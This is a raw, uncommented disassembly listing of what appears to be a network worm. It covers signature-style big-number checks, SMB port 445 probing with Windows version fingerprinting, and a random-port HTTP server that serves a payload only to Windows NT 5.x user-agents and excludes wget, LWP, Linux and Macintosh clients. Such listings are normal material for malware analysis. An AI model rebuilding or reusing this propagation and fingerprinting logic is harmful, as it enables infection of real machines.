loc_9AE12C: ; CODE XREF: sub_9AE0FB+36�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_9AE12C
push [ebp+arg_8]
push [ebp+Dst]
call sub_9AE0A1
test eax, eax
pop ecx
pop ecx
jl short loc_9AE15D
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AE151: ; CODE XREF: sub_9AE0FB+60�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AE151
loc_9AE15D: ; CODE XREF: sub_9AE0FB+47�j
mov eax, edx
shr eax, 5
mov eax, [ebx+eax*4]
mov ecx, edx
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AE1B3
mov edi, [ebp+Dst]
mov esi, [ebp+arg_4]
mov ecx, 81h
xor eax, eax
loc_9AE17D: ; CODE XREF: sub_9AE0FB+8C�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AE17D
push [ebp+arg_8]
push [ebp+Dst]
call sub_9AE0A1
test eax, eax
pop ecx
pop ecx
jl short loc_9AE1B3
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AE1A7: ; CODE XREF: sub_9AE0FB+B6�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AE1A7
loc_9AE1B3: ; CODE XREF: sub_9AE0FB+73�j
; sub_9AE0FB+9D�j
dec edx
jns loc_9AE122
pop edi
pop esi
loc_9AE1BC: ; CODE XREF: sub_9AE0FB+1F�j
pop ebp
retn
sub_9AE0FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE1BE proc near ; CODE XREF: sub_9AE286+89�p
var_410 = byte ptr -410h
Dst = byte ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push esi
push 200h ; Size
lea eax, [edi+4]
push 0 ; Val
push eax ; Dst
mov dword ptr [edi], 1
call memset
mov esi, 204h
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push [ebp+arg_4]
call sub_9AE0D6
and [ebp+var_4], 0
add esp, 1Ch
test eax, eax
mov [ebp+var_8], eax
jl short loc_9AE283
push ebx
loc_9AE20A: ; CODE XREF: sub_9AE1BE+C2�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov eax, ecx
shr eax, 5
mov eax, [edx+eax*4]
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AE248
push [ebp+arg_8] ; int
lea eax, [ebp+var_410]
push edi ; int
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9AE0FB
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
push edi ; Dst
call memcpy
add esp, 18h
loc_9AE248: ; CODE XREF: sub_9AE1BE+61�j
push [ebp+arg_8] ; int
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_410]
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9AE0FB
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
mov eax, ebx
push eax ; Dst
call memcpy
add esp, 18h
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jle short loc_9AE20A
pop ebx
loc_9AE283: ; CODE XREF: sub_9AE1BE+49�j
pop esi
leave
retn
sub_9AE1BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE286(void *Src, int, int, int)
sub_9AE286 proc near ; CODE XREF: sub_9AE331+4F�p
var_810 = byte ptr -810h
var_611 = byte ptr -611h
var_60C = byte ptr -60Ch
var_408 = byte ptr -408h
var_208 = dword ptr -208h
var_204 = dword ptr -204h
Dst = byte ptr -200h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_4]
push esi
push edi
mov esi, 200h
push esi ; Size
mov [ebp+var_204], eax
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call memset
push 204h ; Size
lea eax, [ebp+var_60C]
push 0 ; Val
push eax ; Dst
call memset
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+var_60C]
push eax ; Dst
call memcpy
mov eax, [ebp+arg_C]
and [ebp+var_208], 0
add esp, 24h
xor ecx, ecx
add eax, 1FFh
loc_9AE2E5: ; CODE XREF: sub_9AE286+6C�j
mov dl, [eax]
mov [ebp+ecx+var_408], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9AE2E5
lea eax, [ebp+var_60C]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_408]
push eax
lea edi, [ebp+var_810]
call sub_9AE1BE
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_611]
loc_9AE31F: ; CODE XREF: sub_9AE286+A5�j
mov dl, [eax]
mov edi, [ebp+arg_8]
mov [ecx+edi], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9AE31F
pop edi
pop esi
leave
retn
sub_9AE286 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE331(void *Src, int, int, int, int)
sub_9AE331 proc near ; CODE XREF: sub_9AD914+2A�p
Buf1 = byte ptr -400h
var_3FF = byte ptr -3FFh
Dst = byte ptr -3FEh
var_240 = byte ptr -240h
Buf2 = byte ptr -200h
var_80 = byte ptr -80h
var_40 = byte ptr -40h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
push 1FEh ; Size
lea eax, [ebp+Dst]
push 0FFh ; Val
push eax ; Dst
mov [ebp+Buf1], 0
mov [ebp+var_3FF], 1
call memset
lea eax, [ebp+var_240]
push eax ; Dst
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
call sub_9B5980
push [ebp+arg_8] ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+arg_4] ; int
push [ebp+Src] ; Src
call sub_9AE286
push 180h ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp
add esp, 34h
test eax, eax
jnz short loc_9AE3F6
push 40h ; Size
lea eax, [ebp+var_40]
push eax ; Buf2
lea eax, [ebp+var_240]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9AE3F6
push 40h
lea eax, [ebp+var_80]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9AE06F
lea eax, [ebp+var_40]
push eax ; Dst
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
call sub_9B5980
push 40h ; Size
lea eax, [ebp+var_40]
push eax ; Buf2
lea eax, [ebp+var_80]
push eax ; Buf1
call memcmp
add esp, 28h
neg eax
sbb eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9AE3F6: ; CODE XREF: sub_9AE331+71�j
; sub_9AE331+8A�j
xor al, al
leave
retn
sub_9AE331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE3FA(int, u_short netshort)
sub_9AE3FA proc near ; CODE XREF: sub_9A9B77+9�p
var_3C = dword ptr -3Ch
s = dword ptr -2Ch
var_28 = dword ptr -28h
len = dword ptr -24h
hMem = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
netshort = word ptr 0Ch
push 1Ch
push offset stru_9A4AC8
call __SEH_prolog
or ebx, 0FFFFFFFFh
mov [ebp+var_1C], ebx
mov [ebp+s], ebx
xor edi, edi
mov [ebp+hMem], edi
mov [ebp+ms_exc.disabled], edi
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket
mov esi, eax
mov [ebp+s], esi
cmp esi, 0FFFFFFFFh
jz loc_9AE65D
push 4 ; int
push dword ptr [ebp+netshort] ; netshort
push [ebp+arg_0] ; int
push esi ; fd
call sub_9AB9DA
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_9AE65D
cmp [ebp+netshort], 1BDh
jz short loc_9AE49B
push 7 ; int
push 48h ; int
push offset unk_9A4980 ; int
push esi ; s
call sub_9AB936
add esp, 10h
cmp eax, 48h
jnz loc_9AE65D
push 7 ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov [ebp+hMem], eax
cmp eax, edi
jz loc_9AE65D
cmp [ebp+len], edi
jz loc_9AE65D
push eax ; hMem
call GlobalFree
mov [ebp+hMem], edi
loc_9AE49B: ; CODE XREF: sub_9AE3FA+57�j
push 7
pop edi
push edi ; int
push 33h ; int
push offset dword_9A49CC ; int
push esi ; s
call sub_9AB936
add esp, 10h
cmp eax, 33h
jnz loc_9AE65D
push edi ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov [ebp+hMem], eax
test eax, eax
jz loc_9AE65D
cmp [ebp+len], 0
jz loc_9AE65D
push eax ; hMem
call GlobalFree
and [ebp+hMem], 0
push edi ; int
push 4Dh ; int
push offset dword_9A4A00 ; int
push esi ; s
call sub_9AB936
add esp, 10h
cmp eax, 4Dh
jnz loc_9AE65D
push edi ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov [ebp+hMem], eax
test eax, eax
jz loc_9AE65D
mov eax, [ebp+len]
test eax, eax
jz loc_9AE620
loc_9AE524: ; CODE XREF: sub_9AE3FA+13E�j
dec eax
mov [ebp+var_28], eax
mov ecx, [ebp+hMem]
test eax, eax
jz loc_9AE65D
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AE524
test eax, eax
jz loc_9AE65D
loc_9AE542: ; CODE XREF: sub_9AE3FA+159�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9AE65D
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AE542
test eax, eax
jz loc_9AE65D
loc_9AE55D: ; CODE XREF: sub_9AE3FA+174�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9AE65D
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AE55D
test eax, eax
jz loc_9AE65D
lea edi, [eax+ecx]
push edi ; SubStr
call _strlwr
mov [esp+3Ch+var_3C], offset aVista ; "vista"
push edi ; Str
mov esi, strstr
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5C8
push offset aServicePack1 ; "service pack 1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5AD
push 9
jmp loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE5AD: ; CODE XREF: sub_9AE3FA+1AA�j
push offset aServicePack ; "service pack"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 2
add ebx, 8
jmp loc_9AE65A
; ---------------------------------------------------------------------------
loc_9AE5C8: ; CODE XREF: sub_9AE3FA+19C�j
push offset aWindowsServer2 ; "windows server 2003"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE612
push offset aServicePack1 ; "service pack 1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5E8
push 5
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE5E8: ; CODE XREF: sub_9AE3FA+1E8�j
push offset aServicePack2 ; "service pack 2"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5FA
push 6
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE5FA: ; CODE XREF: sub_9AE3FA+1FA�j
push offset aServicePack ; "service pack"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 3
add ebx, 4
jmp short loc_9AE65A
; ---------------------------------------------------------------------------
loc_9AE612: ; CODE XREF: sub_9AE3FA+1DA�j
push offset aWindows5_1 ; "windows 5.1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE624
loc_9AE620: ; CODE XREF: sub_9AE3FA+124�j
push 3
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE624: ; CODE XREF: sub_9AE3FA+224�j
push offset aWindows5_0 ; "windows 5.0"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE636
push 2
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE636: ; CODE XREF: sub_9AE3FA+236�j
push offset aWindows4_0 ; "windows 4.0"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE649
xor ebx, ebx
inc ebx
jmp short loc_9AE65A
; ---------------------------------------------------------------------------
loc_9AE649: ; CODE XREF: sub_9AE3FA+248�j
push offset aUnix ; "unix"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE65D
push 0Bh
loc_9AE659: ; CODE XREF: sub_9AE3FA+1AE�j
; sub_9AE3FA+1EC�j ...
pop ebx
loc_9AE65A: ; CODE XREF: sub_9AE3FA+1C9�j
; sub_9AE3FA+216�j ...
mov [ebp+var_1C], ebx
loc_9AE65D: ; CODE XREF: sub_9AE3FA+31�j
; sub_9AE3FA+4B�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AE671
; ---------------------------------------------------------------------------
loc_9AE663: ; DATA XREF: .text:stru_9A4AC8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE667: ; DATA XREF: .text:stru_9A4AC8�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_9AE671: ; CODE XREF: sub_9AE3FA+267�j
cmp [ebp+hMem], 0
jz short loc_9AE680
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AE680: ; CODE XREF: sub_9AE3FA+27B�j
cmp [ebp+s], 0FFFFFFFFh
jz short loc_9AE69A
push 1 ; how
push [ebp+s] ; s
call shutdown
push [ebp+s] ; s
call closesocket
loc_9AE69A: ; CODE XREF: sub_9AE3FA+28A�j
mov eax, ebx
call __SEH_epilog
retn
sub_9AE3FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AE6A2(LPVOID)
sub_9AE6A2 proc near ; DATA XREF: sub_9AEAF7+116�o
Buf2 = byte ptr -29Ch
var_9D = byte ptr -9Dh
Str = byte ptr -9Ch
var_5D = byte ptr -5Dh
name = sockaddr ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
netlong = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
hMem = dword ptr -2Ch
var_28 = dword ptr -28h
len = dword ptr -24h
s = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 28Ch
push offset stru_9A4B98
call __SEH_prolog
mov eax, [ebp+arg_0]
mov [ebp+var_44], eax
mov esi, [eax]
mov [ebp+s], esi
mov eax, [eax+4]
mov [ebp+netlong], eax
xor ebx, ebx
mov [ebp+var_38], ebx
mov [ebp+hMem], ebx
mov [ebp+var_1C], ebx
mov [ebp+len], 10h
call sub_9AB510
mov [ebp+ms_exc.disabled], ebx
lea eax, [ebp+len]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push esi ; s
call getsockname
cmp eax, 0FFFFFFFFh
jz short loc_9AE6F6
mov eax, dword ptr [ebp+name.sa_data+2]
mov [ebp+var_38], eax
loc_9AE6F6: ; CODE XREF: sub_9AE6A2+4C�j
push 7 ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov edi, eax
mov [ebp+hMem], edi
cmp edi, ebx
jz loc_9AE9D8
push offset dword_9BA28C
mov esi, offset aGetSHttp ; "get /%s http/"
push esi ; Format
push 200h ; Count
lea eax, [ebp+Buf2]
push eax ; Dest
mov ebx, _snprintf
call ebx ; _snprintf
mov [ebp+var_9D], 0
push offset dword_9BA298
push esi ; Format
push 40h ; Count
lea eax, [ebp+Str]
push eax ; Dest
call ebx ; _snprintf
add esp, 20h
mov [ebp+var_5D], 0
mov eax, [ebp+len]
test eax, eax
jz short loc_9AE764
mov byte ptr [eax+edi-1], 0
push edi ; Str
call _strlwr
pop ecx
loc_9AE764: ; CODE XREF: sub_9AE6A2+B3�j
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AE7A0
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AE7A0
mov [ebp+var_1C], 1
jmp short loc_9AE7DA
; ---------------------------------------------------------------------------
loc_9AE7A0: ; CODE XREF: sub_9AE6A2+D2�j
; sub_9AE6A2+F3�j
lea eax, [ebp+Str]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AE7DA
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+Str]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AE7DA
mov [ebp+var_1C], 2
loc_9AE7DA: ; CODE XREF: sub_9AE6A2+FC�j
; sub_9AE6A2+10E�j ...
cmp [ebp+var_1C], 0
jz loc_9AE9D8
xor esi, esi
inc esi
mov [ebp+var_28], esi
push [ebp+netlong] ; netlong
call sub_9A8DB4
pop ecx
test eax, eax
jnz loc_9AE88E
cmp [ebp+var_1C], esi
jnz loc_9AE88A
push offset asc_9A4B80 ; "\r\n\r"
push edi ; Str
mov esi, strstr
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE88A
push offset aUserAgent ; "\r\nuser-agent:"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_48], edi
test edi, edi
jz short loc_9AE88E
push offset asc_9A4228 ; "\r\n"
lea eax, [edi+2]
push eax ; Str
call esi ; strstr
pop ecx
pop ecx
mov [ebp+var_4C], eax
test eax, eax
jz short loc_9AE88E
mov byte ptr [eax], 0
push offset aWindowsNt5_ ; "windows nt 5."
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE88E
push offset aWget ; "wget"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
push offset aLwp ; "lwp::"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
push offset aLinux ; "linux"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
push offset aMacintosh ; "macintosh"
push [ebp+hMem] ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
loc_9AE88A: ; CODE XREF: sub_9AE6A2+15C�j
; sub_9AE6A2+174�j
and [ebp+var_28], 0
loc_9AE88E: ; CODE XREF: sub_9AE6A2+153�j
; sub_9AE6A2+187�j ...
xor eax, eax
cmp [ebp+var_28], eax
jnz short loc_9AE8A9
mov ecx, ds:lpBuffer
mov [ebp+var_3C], ecx
mov esi, ds:nNumberOfBytesToWrite
mov [ebp+var_34], esi
jmp short loc_9AE8AC
; ---------------------------------------------------------------------------
loc_9AE8A9: ; CODE XREF: sub_9AE6A2+1F1�j
mov esi, [ebp+var_34]
loc_9AE8AC: ; CODE XREF: sub_9AE6A2+205�j
cmp [ebp+var_28], eax
jz short loc_9AE8CF
mov [ebp+var_1C], 4
mov [ebp+var_3C], eax
call rand
mov esi, eax
add esi, 64h
imul esi, 3E8h
mov [ebp+var_34], esi
loc_9AE8CF: ; CODE XREF: sub_9AE6A2+20D�j
mov edi, rand
call edi ; rand
and eax, 3
push ds:off_9B9D98[eax*4]
push esi
push offset aHttp1_0200OkPr ; "HTTP/1.0 200 OK\r\nPragma: no-cache\r\nCont"...
push 200h ; Count
lea eax, [ebp+Buf2]
push eax ; Dest
call ebx ; _snprintf
add esp, 14h
mov [ebp+var_9D], 0
and [ebp+var_30], 0
push 7 ; int
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
pop ecx
push eax ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+s] ; s
call sub_9AB936
mov ebx, eax
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
add esp, 14h
cmp eax, ebx
jnz short loc_9AE99F
cmp [ebp+var_1C], 4
jz short loc_9AE95B
push 7 ; int
push esi ; int
push [ebp+var_3C] ; int
push [ebp+s] ; s
call sub_9AB936
add esp, 10h
cmp esi, eax
jnz short loc_9AE99F
mov [ebp+var_30], 1
jmp short loc_9AE99F
; ---------------------------------------------------------------------------
loc_9AE95B: ; CODE XREF: sub_9AE6A2+299�j
mov esi, 1FFh
loc_9AE960: ; CODE XREF: sub_9AE6A2+2FB�j
push esi
lea eax, [ebp+Buf2]
push eax
call sub_9AB647
pop ecx
pop ecx
call edi ; rand
cdq
mov ecx, 1388h
idiv ecx
add edx, 6A4h
push edx ; dwMilliseconds
call Sleep
push 7 ; int
push esi ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+s] ; s
call sub_9AB936
add esp, 10h
cmp eax, esi
jz short loc_9AE960
loc_9AE99F: ; CODE XREF: sub_9AE6A2+293�j
; sub_9AE6A2+2AE�j ...
cmp [ebp+var_30], 0
jz short loc_9AE9D8
cmp [ebp+var_1C], 1
jnz short loc_9AE9D8
push offset dword_9B9F38 ; lpAddend
call InterlockedIncrement
push ds:dword_9B9F38 ; Data
call sub_9A81C3
push [ebp+var_38]
push [ebp+netlong]
call sub_9AC911
add esp, 0Ch
jmp short loc_9AE9D8
; ---------------------------------------------------------------------------
loc_9AE9D1: ; DATA XREF: .text:stru_9A4B98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE9D5: ; DATA XREF: .text:stru_9A4B98�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AE9D8: ; CODE XREF: sub_9AE6A2+6A�j
; sub_9AE6A2+13C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp [ebp+hMem], 0
jz short loc_9AE9EB
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AE9EB: ; CODE XREF: sub_9AE6A2+33E�j
push 1 ; how
push [ebp+s] ; s
call shutdown
push [ebp+s] ; s
call closesocket
push [ebp+var_44] ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AE6A2 endp
; =============== S U B R O U T I N E =======================================
sub_9AEA12 proc near ; CODE XREF: sub_9AEAF7+62�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 18h
push ebx
push ebp
push edi
xor edi, edi
push 10h ; Size
lea eax, [esp+28h+Dst]
push edi ; Val
push eax ; Dst
mov [esp+30h+var_14], edi
call memset
mov [esp+30h+Dst], 2
mov [esp+30h+var_C], edi
call sub_9AB343
push eax ; Seed
call srand
mov ebx, Sleep
add esp, 10h
mov [esp+24h+var_18], edi
mov ebp, 1388h
loc_9AEA54: ; CODE XREF: sub_9AEA12+C0�j
call rand
cdq
mov ecx, 2310h
idiv ecx
mov edi, edx
add edi, 400h
push edi
call sub_9A8FED
test eax, eax
pop ecx
jnz short loc_9AEA8C
cmp ds:dword_9BA2A8, eax
jnz short loc_9AEA8F
call sub_9A8CAF
mov ds:dword_9BA2A8, 1
loc_9AEA8C: ; CODE XREF: sub_9AEA12+61�j
push ebp ; dwMilliseconds
call ebx ; Sleep
loc_9AEA8F: ; CODE XREF: sub_9AEA12+69�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_9AEADE
push edi ; netshort
call ntohs
mov [esp+24h+var_E], ax
push 10h ; namelen
lea eax, [esp+28h+Dst]
push eax ; name
push dword ptr [esi] ; s
call bind
test eax, eax
jz short loc_9AEAD6
push dword ptr [esi] ; s
call closesocket
inc [esp+24h+var_18]
cmp [esp+24h+var_18], 0Ah
jl short loc_9AEA54
jmp short loc_9AEADE
; ---------------------------------------------------------------------------
loc_9AEAD6: ; CODE XREF: sub_9AEA12+AD�j
mov [esp+24h+var_14], 1
loc_9AEADE: ; CODE XREF: sub_9AEA12+8E�j
; sub_9AEA12+C2�j
call sub_9AB510
mov eax, [esp+24h+var_14]
movzx ecx, di
neg eax